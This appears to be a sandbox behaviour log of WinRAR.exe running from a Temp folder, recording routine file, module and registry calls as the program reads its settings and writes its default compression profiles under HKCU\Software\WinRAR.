Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\WinRAR.ini, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\WinRAR.ini, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, base_address = 0x0 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
Fn
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
File Create filename = C:\Users\WhuOXYsD\AppData\Local\Temp\winrar.lng, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
File Create filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\winrar.lng, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\riched20.dll, base_address = 0x7fef7980000 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Name, data = Default Profile, size = 32, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Default, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcName False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileNames False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ImmExec, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ExclNames, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = StoreNames, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = UseRAR, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RAR5, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXModule, size = 2, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFX False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXIcon, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXLogo, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXElevate, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtFile, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtDataWide, size = 2, type = REG_BINARY True 1
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolumeSize, data = 0, size = 4, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolSizeMod, data = 2, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolPause, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = OldVolNames, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecVolNumber, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Update, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Fresh, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SyncFiles, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Overwrite, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Move, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcRecBin, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcWipe, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = WipeIfPassword, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Solid, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Test, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecEnabled, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecSize, data = 4294967293, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EraseDest, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = AddArcOnly, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ClearArc, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Lock, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Method, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = DictSizeLZ, data = 4194304, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = DictSize, data = 33554432, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Background, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = WaitForOther, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Shutdown, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PasswordData, size = 1, type = REG_BINARY True 1
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EncryptHeaders, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ZipLegacyEncrypt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = OpenShared, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ProcessOwners, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SaveStreams, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SaveSymLinks, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SaveHardLinks, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = GenerateArcName, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VersionControl, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = BLAKE2, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileCopies, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = QuickOpen, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = GenerateMask, data = yyyymmddhhmmss, size = 30, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileTimeMode, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileDays, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileHours, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileMinutes, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileTimeLimit, data = 0, size = 8, type = REG_QWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcTimeOriginal, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcTimeLatest, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = mtime, data = 4, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ctime, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = atime, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PathsAbs, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PathsNone, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PathsAbsDrive, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SeparateArc, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SeparateArcDoubleExt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SeparateArcSubfolders, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EmailArcTo, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PackDetails, size = 192, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = SMP, data = 1, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Name, data = Default Profile, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Name, data = Create e-mail attachment, size = 50, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Default, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ArcName False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = FileNames False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ImmExec, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ExclNames, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = StoreNames, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = UseRAR, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = RAR5, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SFXModule, size = 2, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SFX False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SFXIcon, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SFXLogo, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SFXElevate, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = CmtFile, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = CmtDataWide, size = 2, type = REG_BINARY True 1
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = VolumeSize, data = 0, size = 4, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = VolSizeMod, data = 2, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = VolPause, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = OldVolNames, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = RecVolNumber, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Update, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Fresh, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
